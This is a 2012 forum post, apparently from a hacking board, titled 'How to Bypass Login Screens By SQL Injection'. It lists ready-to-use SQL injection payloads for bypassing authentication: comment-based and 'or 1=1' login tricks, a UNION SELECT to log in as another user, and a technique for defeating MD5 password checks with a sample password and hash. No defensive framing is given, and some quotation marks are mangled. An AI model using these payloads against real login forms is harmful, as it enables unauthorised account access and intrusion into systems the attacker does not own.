EXPERTS AND PROFESSIONALS ONLY!


    How to Bypass Login Screens By SQL Injection

    Share

    zeusk
    Admin

    Posts : 144
    Join date : 2011-12-04

    How to Bypass Login Screens By SQL Injection

    Post  zeusk on Sun Nov 11, 2012 6:29 pm

    Bypassing Login Screens (SMO+) SQL Injection 101, Login tricks admin’ — admin’ # admin’/* ‘ or 1=1– ‘ or 1=1# ‘ or 1=1/* ‘) or ’1′=’1– ‘) or (’1′=’1– …. Login as different user (SM*) ‘ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1– *Old versions of MySQL doesn’t support union queries Bypassing second MD5 hash check login screens If application is first getting the record by username and then compare returned MD5 with supplied password’s MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database. Bypassing MD5 Hash Check Example (MSP) Username : admin Password : 1234 ‘ AND 1=0 UNION ALL SELECT ‘admin’, ’81dc9bdb52d04dc20036dbd8313ed055 81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)

      Current date/time is Sun Dec 11, 2016 11:47 am